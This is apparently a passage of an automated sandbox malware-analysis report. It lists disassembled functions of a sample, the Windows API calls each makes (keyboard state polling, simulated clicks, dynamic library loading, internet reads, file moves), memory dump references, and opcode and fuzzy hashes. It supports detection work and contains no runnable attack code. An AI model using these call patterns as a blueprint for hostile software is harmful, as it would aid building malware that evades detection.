                                                                                                                                                                                                                                                                                                                            • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0023EF67
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 3183298772-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 86d61e69f11ff16828695879477c869bbd465c391f27e926541adfd9c10a819f
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 117ecd55d7b6076569d81e48db648a0bba69858c6e71bec43c713ece8f6e0e6b
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 86d61e69f11ff16828695879477c869bbd465c391f27e926541adfd9c10a819f
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E55162F25183499BCB24EB90D8919DFB3ECAF95340F00092EF68583191EF71A69C8B56
                                                                                                                                                                                                                                                                                                                            Function 00239517 Relevance: 7.7, APIs: 5, Instructions: 159COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 00239534
                                                                                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32 ref: 002395A5
                                                                                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32 ref: 00239604
                                                                                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00239677
                                                                                                                                                                                                                                                                                                                            • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 002396A2
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Variant$Clear$ChangeInitType
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 4136290138-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: b0bab09607d951ecfe6d1b504bdd055545ec5772e0f75208fa9ae6c322145345
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 0af4f57a83f33a28436236e30c861f9e4a68926d849662ff99d18cae7c02b762
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b0bab09607d951ecfe6d1b504bdd055545ec5772e0f75208fa9ae6c322145345
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 065159B5A10219EFCB10CF68D884AAAB7F8FF89310F158559E905DB310E770E961CF90
                                                                                                                                                                                                                                                                                                                            Function 00249540 Relevance: 7.6, APIs: 5, Instructions: 143COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 002495F3
                                                                                                                                                                                                                                                                                                                            • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 0024961F
                                                                                                                                                                                                                                                                                                                            • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00249677
                                                                                                                                                                                                                                                                                                                            • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0024969C
                                                                                                                                                                                                                                                                                                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 002496A4
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: PrivateProfile$SectionWrite$String
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2832842796-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: fa49702f305e10bf8004e1c5e2424f2ed6b6bc8c4d352ad6986f4a458bc3b86f
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 97e606aca98e99bd334485711c94727110057cd46032c5e45795a1dd87c8eb83
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fa49702f305e10bf8004e1c5e2424f2ed6b6bc8c4d352ad6986f4a458bc3b86f
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D9515A35A00219AFCB05DF65C884A6ABBF5FF58314F048059E909AB362CB35ED51CF90
                                                                                                                                                                                                                                                                                                                            Function 00259941 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • LoadLibraryW.KERNEL32(?,00000000,?), ref: 0025999D
                                                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00259A2D
                                                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00259A49
                                                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00259A8F
                                                                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00259AAF
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001EF9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00241A02,?,7529E610), ref: 001EF9F1
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001EF9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00230354,00000000,00000000,?,?,00241A02,?,7529E610,?,00230354), ref: 001EFA18
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 666041331-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 45861e7641b39ff1f537086d65c8ad90e3c13151447aae6cb686bf57bebb59e8
                                                                                                                                                                                                                                                                                                                            • Instruction ID: cf5163ac9ed3cbb1e08e16bde4e8147c5851705bd2ea6ff1fd061e6f0233ddc6
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 45861e7641b39ff1f537086d65c8ad90e3c13151447aae6cb686bf57bebb59e8
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3D515C35A04246DFCB01DF68C4848ADBBF1FF19314B198199E80A9B362D771ED86CF91
                                                                                                                                                                                                                                                                                                                            Function 002675AE Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(00000002,000000F0,?), ref: 0026766B
                                                                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(?,000000EC,?), ref: 00267682
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 002676AB
                                                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,0024B5BE,00000000,00000000), ref: 002676D0
                                                                                                                                                                                                                                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 002676FF
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Window$Long$MessageSendShow
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 3688381893-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: a29c7e49705e4ab81a631e94c8254c249f7895d3a685efcf075f9393279fc7c4
                                                                                                                                                                                                                                                                                                                            • Instruction ID: cc2e13f63cc6128ff31836c668da96301c2812e969393c145004e17a03f2097b
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a29c7e49705e4ab81a631e94c8254c249f7895d3a685efcf075f9393279fc7c4
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 44410835A28505AFD725CF2CEC48FA57B69FB05364F150224F815A73E0D7B0EDA0DA50
                                                                                                                                                                                                                                                                                                                            Function 002023C1 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: _free
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 269201875-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 5a90c4c6e5c378a955620b41178e010f379ff94560378880344c5f45f39b7b17
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 0b0d7464c386f212a883106858199d744a4bc038a3ec5d588fdc16c59113735e
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5a90c4c6e5c378a955620b41178e010f379ff94560378880344c5f45f39b7b17
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FB41B032A10304DBCB20DF78C889A6AB3F6EF89314B1545AAE515EB292D731ED15DB80
                                                                                                                                                                                                                                                                                                                            Function 001D19CD Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetCursorPos.USER32(?), ref: 001D19E1
                                                                                                                                                                                                                                                                                                                            • ScreenToClient.USER32(00000000,?), ref: 001D19FE
                                                                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(00000001), ref: 001D1A23
                                                                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(00000002), ref: 001D1A3D
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: AsyncState$ClientCursorScreen
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 4210589936-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 1e225ed07dcc8ec9494867d679fb62e3f482f554c2df09ce38249a7c0abd3e38
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 5e3b27093520dc45de061a3950f6e208aca2fadf57e6df4d4a7ee633827eba98
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1e225ed07dcc8ec9494867d679fb62e3f482f554c2df09ce38249a7c0abd3e38
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 59416D71A0414AFFDF15DF64C844BEEB7B5FB15324F20821AE429A3290C7706EA4CBA1
                                                                                                                                                                                                                                                                                                                            Function 0023224E Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00232262
                                                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(00000001,00000201,00000001), ref: 0023230E
                                                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000000,?,?,?), ref: 00232316
                                                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(00000001,00000202,00000000), ref: 00232327
                                                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000000,?,?,?,?), ref: 0023232F
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: MessagePostSleep$RectWindow
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 3382505437-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 3b27d91547ad9f7087aa1924e333833c2dda045977104394abbe835b18418a43
                                                                                                                                                                                                                                                                                                                            • Instruction ID: a9acc9d52da07b2ad91cf8d2060c2ef28e46a17f19bef4892f3899a67aea63ab
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3b27d91547ad9f7087aa1924e333833c2dda045977104394abbe835b18418a43
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1931B3B1A1021AEFDB14CFA8DD89ADE3BB5EB04315F108255F925AB2D0C7B09954DB90
                                                                                                                                                                                                                                                                                                                            Function 0024D95F Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,0024CC63,00000000), ref: 0024D97D
                                                                                                                                                                                                                                                                                                                            • InternetReadFile.WININET(?,00000000,?,?), ref: 0024D9B4
                                                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00000000,?,?,?,0024CC63,00000000), ref: 0024D9F9
                                                                                                                                                                                                                                                                                                                            • SetEvent.KERNEL32(?,?,00000000,?,?,?,0024CC63,00000000), ref: 0024DA0D
                                                                                                                                                                                                                                                                                                                            • SetEvent.KERNEL32(?,?,00000000,?,?,?,0024CC63,00000000), ref: 0024DA37
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 3191363074-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: c964ff3e5e273fd17530cefd6798c9bfad7df8bff22862701ec51bf6b94aa50f
                                                                                                                                                                                                                                                                                                                            • Instruction ID: da2d5f12e2e7e00507c617c92e1df0264ff41eacd8147a2fd7c6ca36e624975b
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c964ff3e5e273fd17530cefd6798c9bfad7df8bff22862701ec51bf6b94aa50f
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8D318F71A24209EFDB28DFA5E884AAFB7F8EF14350B10842EE546D2251D770EE50DB60
                                                                                                                                                                                                                                                                                                                            Function 002661A5 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001053,000000FF,?), ref: 002661E4
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001074,?,00000001), ref: 0026623C
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 0026624E
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00266259
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 002662B5
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: MessageSend$_wcslen
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 763830540-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: f41a91921694b9ef90fa563bef41b2df04d33bef82bb23a5e9d3eed9a2fc507b
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 7f2346904c6de0d4f15fe7ae6cc3b9015d83d40f42cc47be67111856c6294aa8
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f41a91921694b9ef90fa563bef41b2df04d33bef82bb23a5e9d3eed9a2fc507b
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FE2193319202199BDB119FA4DC88AEEB7B8EB05724F108256FA25EA180D7B499D5CF90
                                                                                                                                                                                                                                                                                                                            Function 0025138D Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • IsWindow.USER32(00000000), ref: 002513AE
                                                                                                                                                                                                                                                                                                                            • GetForegroundWindow.USER32 ref: 002513C5
                                                                                                                                                                                                                                                                                                                            • GetDC.USER32(00000000), ref: 00251401
                                                                                                                                                                                                                                                                                                                            • GetPixel.GDI32(00000000,?,00000003), ref: 0025140D
                                                                                                                                                                                                                                                                                                                            • ReleaseDC.USER32(00000000,00000003), ref: 00251445
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Window$ForegroundPixelRelease
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 4156661090-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 1910b144a57bdeaebc7ab897bedd348415358427a78f94b3cdbd68dd97e3609b
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 733d2b523bc1149f4fb1c0daf0d4c4656ee57b6e3767ee5bc9106d21d56ef59d
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1910b144a57bdeaebc7ab897bedd348415358427a78f94b3cdbd68dd97e3609b
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5B218E36A00208EFD704EF65DC98A9EB7F9EF88305B048469F84A97761CB70AC44CF90
                                                                                                                                                                                                                                                                                                                            Function 0020D13D Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetEnvironmentStringsW.KERNEL32 ref: 0020D146
